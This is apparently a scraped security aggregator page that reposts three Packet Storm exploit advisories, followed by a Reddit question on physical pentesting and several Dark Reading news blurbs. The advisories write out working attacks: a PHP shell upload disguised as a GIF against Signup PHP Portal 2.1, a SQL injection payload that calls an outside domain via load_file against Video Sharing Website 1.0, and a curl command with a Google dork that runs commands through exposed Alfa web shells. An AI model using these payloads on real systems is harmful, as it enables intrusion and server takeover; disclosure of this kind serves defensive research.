Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Signup PHP Portal 2.1 Shell Upload
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Signup PHP Portal version 2.1 suffers from a remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Signup PHP Portal 2.1 Shell Upload
https://2.bp.blogspot.com/-U4x-65bW3GQ/WWlvNN9osvI/AAAAAAAAIMY/h5EIQTz5wbsbDMf6z0LfMa0yML4cI035gCLcBGAs/s1600/h21.png
Signup PHP Portal version 2.1 suffers from a remote shell upload vulnerability.
MD5 |
e464561cff8e90dcfa451a5ce5f9f8d5Download
# Exploit Title: Signup Php Portal Arbitrary File Upload
# Google Dork: N/A
# Date: 19/12/2021
# Exploit Author: Sohel Yousef - sohel.yousef@yandex.com
# Software Link: https://codecanyon.net/item/signup-php-portal/23066564
# Software Demo :https://ocsolutions.co.in/signup_custom_script/customer_register.php
# Category: webapps
# Version: 2.1
1. Description
Signup Php Portal script contain arbitrary file upload
using the form you can upload php files and bypass secuirty with burb suite intercept tool
signup link :
https://localhost/signup_custom_script/customer_register.php
in the section of other images upload your file.php.gif and use intercept tool in burbsuite to edit the raw
details
POST /signup_custom_script/upload.php HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: */*
Accept-Language: ar,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------232155580731505179933631361962
Content-Length: 294712
Origin: https://localhost
Connection: close
Referer: https://localhost/signup_custom_script/customer_register.php
Cookie: language=en-gb; currency=GBP; PHPSESSID=055209d5effdb7d44487349cbd66243e
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
-----------------------------232155580731505179933631361962
Content-Disposition: form-data; name="name"
p1fna9ivqhk6g1fbjqto1f711ooq9.gif <-------
-----------------------------232155580731505179933631361962
Content-Disposition: form-data; name="file"; filename="2.php.gif" <-------
Content-Type: image/gif
#####
forward and all done
your file name will be
p1fna9ivqhk6g1fbjqto1f711ooq9.php
and this is the upload dir
https://localhost//signup_custom_script/uploads/
your file will be on this link
https://localhost//signup_custom_script/uploads/p1fna9ivqhk6g1fbjqto1f711ooq9.php
-->
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Video Sharing Website 1.0 SQL Injection
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Video Sharing Website version 1.0 appears to suffer from a remote SQL injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Video Sharing Website 1.0 SQL Injection
https://2.bp.blogspot.com/-TEKdvnpzXEU/WWlu-1G01LI/AAAAAAAAIJ8/FsoklfFFqiwHwKy6Rf6U36sgF7K28-hPgCLcBGAs/s1600/h118.png
Video Sharing Website version 1.0 appears to suffer from a remote SQL injection vulnerability.
MD5 |
65e77333e6364fe5c870b357cfd4ecfdDownload
## Title: Video Sharing Website 1.0 SQL - Injection
## Author: nu11secur1ty
## Date: 12.18.2021
## Vendor: https://www.sourcecodester.com/users/tips23
## Software: https://www.sourcecodester.com/php/14584/video-sharing-website-using-phpmysqli-source-code.html
## Description:
The `email` parameter from `ajax.php` app of Video Sharing Website 1.0
appears to be vulnerable to SQL injection attacks. The payload
'+(select load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+'
was submitted in the email parameter.
This payload injects a SQL sub-query that calls MySQL's load_file
function with a UNC file path that references a URL on an external
domain.
The application interacted with that domain, indicating that the
injected SQL query was executed. The attacker can take administrator
account controll on this system.
Status: CRITICAL
[+] Payload:
```mysql
---
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: email=jsmith@sample.com'+(select
load_file('\\\\dhy5y62urpxije56fiteqimmjdp6dy6mxplh87ww.nu11secur1ty.net\\pkq'))+''
AND (SELECT 8549 FROM (SELECT(SLEEP(5)))PJEk) AND
'yreq'='yreq&password=jsmith123
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/Video-Sharing-Website)
## Proof and Exploit:
[href](https://streamable.com/4x2rfk)
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Alfa Team Shell Tesla 4.1 Remote Code Execution
https://2.bp.blogspot.com/-GUn1a49o67Q/WWlu9F-J_rI/AAAAAAAAIJo/HAAKEGfKUXIq4oSJFA9qEBzdRn_AvSgtACLcBGAs/s1600/h113.png
Alfa Team Shell Tesla version 4.1 suffers from a remote code execution vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Alfa Team Shell Tesla 4.1 Remote Code Execution
https://2.bp.blogspot.com/-GUn1a49o67Q/WWlu9F-J_rI/AAAAAAAAIJo/HAAKEGfKUXIq4oSJFA9qEBzdRn_AvSgtACLcBGAs/s1600/h113.png
Alfa Team Shell Tesla version 4.1 suffers from a remote code execution vulnerability.
MD5 |
4e1d936cbae22ea2647ee9d7e6127458Download
# Exploit Title: ALFA TEAM SHELL TESLA 4.1 - 'cmd' Remote Code Execution (Unauthenticated)
# Google Dork: inurl:/alfacgiapi intext:alfa
# Date: 2021-12-19
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://solevisible.com
# Software Link: https://phpshells.com/alfa-tesla-v4-1-shell
# Version: v4.1
# Tested on: Windows 10 Enterprise x64 , Linux
# [ About - ALFA TEAM SHELL TESLA ] :
#It is one of the most popular web shells used by hackers,They use it to access the server side.
# [ Vulnerable Files ] :
# 1 . perl.alfa
# 2 . bash.alfa
# 3 . py.alfa
# [ Description ]:
#Execute commands without authentication or logging in to the web shell,
#To use, find only one of the vulnerable files,
#Convert your commands to base64 And Submit your request using the CMD parameter and the POST method.
# [ POC ] :
curl -d "cmd=bHMgLWxh" -X POST http://localhost/alfacgiapi/perl.alfa
Source:packetstormsecurity.com
Physical Pen test
https://www.reddit.com/r/Pentesting/comments/rks968/physical_pen_test/
<!-- SC_OFF -->Does anyone here, do physical Penatration test over a company? <!-- SC_ON --> submitted by /u/TsukitoHoshiDream (https://www.reddit.com/user/TsukitoHoshiDream)
[link] (https://www.reddit.com/r/Pentesting/comments/rks968/physical_pen_test/) [comments] (https://www.reddit.com/r/Pentesting/comments/rks968/physical_pen_test/)
https://www.reddit.com/r/Pentesting/comments/rks968/physical_pen_test/
<!-- SC_OFF -->Does anyone here, do physical Penatration test over a company? <!-- SC_ON --> submitted by /u/TsukitoHoshiDream (https://www.reddit.com/user/TsukitoHoshiDream)
[link] (https://www.reddit.com/r/Pentesting/comments/rks968/physical_pen_test/) [comments] (https://www.reddit.com/r/Pentesting/comments/rks968/physical_pen_test/)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Four Out of Five Organizations Are Increasing Cybersecurity Budgets for 2022
Half of security decision makers also say the cyber skills gap will significantly impact their 2022 strategy, according to new research from Neustar.
Four Out of Five Organizations Are Increasing Cybersecurity Budgets for 2022
Half of security decision makers also say the cyber skills gap will significantly impact their 2022 strategy, according to new research from Neustar.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Reblaze Appoints New CEO
Ziv Oren previously held the position of chief operations officer at the company.
Reblaze Appoints New CEO
Ziv Oren previously held the position of chief operations officer at the company.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Trend Micro Crowns Champions of 2021 Capture the Flag Competition
Challenges were designed to address critical areas of cybersecurity, including reversing, cloud, IoT, open source intelligence, forensics, and machine learning.
Trend Micro Crowns Champions of 2021 Capture the Flag Competition
Challenges were designed to address critical areas of cybersecurity, including reversing, cloud, IoT, open source intelligence, forensics, and machine learning.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
SecurityScorecard Research Reveals Cyber Vulnerabilities Pose a Threat to U.S. Maritime Security
While the shipping industry's cyber posture was better than companies in the Forbes Global 2000, the industry performed lower in key risk group factors.
SecurityScorecard Research Reveals Cyber Vulnerabilities Pose a Threat to U.S. Maritime Security
While the shipping industry's cyber posture was better than companies in the Forbes Global 2000, the industry performed lower in key risk group factors.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
BlackBerry Launches New Managed Extended Detection and Response (XDR) Service
Company partners with Exabeam to launch update to its BlackBerry Guard managed detection and response (MDR) service.
BlackBerry Launches New Managed Extended Detection and Response (XDR) Service
Company partners with Exabeam to launch update to its BlackBerry Guard managed detection and response (MDR) service.